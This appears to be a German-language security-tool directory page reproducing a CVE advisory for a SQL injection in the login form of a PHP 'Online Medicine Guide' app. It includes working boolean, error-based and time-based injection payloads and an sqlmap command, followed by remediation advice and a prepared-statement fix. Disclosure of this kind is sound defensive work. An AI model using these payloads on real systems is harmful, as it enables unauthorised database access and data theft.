Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-60736 — code-projects Online Medicine Guide 1.0 ist anfällig für SQL-Injection | Kitploit
Tools/GitHubGitHub/nxvh1337/cve-2025-60736
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubnxvh1337/cve-2025-60736

CVE-2025-60736

code-projects Online Medicine Guide 1.0 ist anfällig für SQL-Injection

Repository anzeigen
1vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-60736: SQL-Injection-Schwachstelle im Online Medicine Guide

Zusammenfassung

Dieses Dokument beschreibt eine kritische SQL-Injection-Schwachstelle, die in der Webanwendung Online Medicine Guide entdeckt wurde. Die Schwachstelle ermöglicht unbefugten Datenbankzugriff und stellt ein erhebliches Sicherheitsrisiko für die Anwendung und ihre Benutzer dar.

Einreicher

  • Noah „nxvh" Heraud

1. Produktinformationen

Betroffenes Produkt

  • Produktname: Online Medicine Guide
  • Anbieter: Code Projects
  • Anbieter-Website: https://code-projects.org/online-medicine-guide-in-php-css-javascript-and-mysql-free-download/
  • Betroffene Version: v1.0
  • Verwundbare Datei: /login.php
  • Softwaretyp: Webanwendung (PHP/MySQL)

Technische Details

  • Programmiersprache: PHP
  • Datenbank: MySQL
  • Frontend: CSS, JavaScript
  • Architektur: LAMP/WAMP-Stack

2. Schwachstellendetails

Schwachstellenklassifizierung

  • CVE-ID: CVE-2025-60736
  • Schwachstellentyp: SQL-Injection
  • Schweregrad: Kritisch
  • CVSS-Score: 9.8 (Kritisch)
  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Erforderliche Berechtigungen: Keine
  • Benutzerinteraktion: Keine
  • Scope: Geändert

Ursachenanalyse

Die Schwachstelle resultiert aus unzureichender Eingabevalidierung und -bereinigung in der Datei /login.php. Die Anwendung verkettet Benutzereingaben vom Parameter upass direkt in SQL-Abfragen, ohne ordnungsgemäße Bereinigung oder Prepared Statements.

Technische Ursache:

  • Direkte Zeichenfolgenverkettung in SQL-Abfragen
  • Fehlende Eingabevalidierung und -bereinigung
  • Fehlende Implementierung von Prepared Statements
  • Unzureichende Parameterbindung

3. Proof of Concept

Schwachstellenort

  • Datei: /login.php
  • Parameter: upass (POST)
  • Angriffsvektor: Manipulation von HTTP-POST-Anfragen

Ausnutzungsmethoden

Methode 1: Boolesche SQL-Injection

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx

Methode 1: Fehlerbasierte SQL-Injection

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp

Methode 2: Zeitbasierte Blind-SQL-Injection

root@kitploit:~
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa

Automatisierte Tests

Die Schwachstelle wurde mit sqlmap bestätigt:

root@kitploit:~
sqlmap -u "http://localhost:8000/login.php" --data="uname=admin&upass=test" -p upass --batch --dbs

proof of exploit

4. Behebungsplan

Sofortmaßnahmen

  1. Notfall-Patch: Implementierung der Eingabevalidierung für den Parameter upass
  2. Datenbanküberwachung: Aktivierung umfassender Protokollierung für verdächtige Aktivitäten
  3. Zugriffsbeschränkung: Implementierung von Ratenbegrenzung und IP-basierten Einschränkungen
  4. Sicherheitsaudit: Durchführung einer unmittelbaren Sicherheitsbewertung

5. Technische Behebung

Beispiel für Codekorrektur

Vorher (verwundbar):

root@kitploit:~
$query = "SELECT * FROM users WHERE username = '" . $_POST['uname'] . "'";

Nachher (sicher):

root@kitploit:~
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$_POST['uname']]);

Implementierung von Sicherheits-Best Practices

  1. Prepared Statements: Ausschließliche Verwendung parametrisierter Abfragen
  2. Eingabevalidierung: Implementierung einer Whitelist-basierten Validierung
  3. Ausgabekodierung: Ordnungsgemäße Kodierung aller Ausgabedaten
  4. Fehlerbehandlung: Implementierung sicherer Fehlerbehandlung ohne Informationsweitergabe
  5. Zugriffskontrollen: Implementierung ordnungsgemäßer Authentifizierung und Autorisierung

Dokumentversion: 1.0
Zuletzt aktualisiert: 03.10.2025 (TT/MM/JJJJ)

Tool herunterladen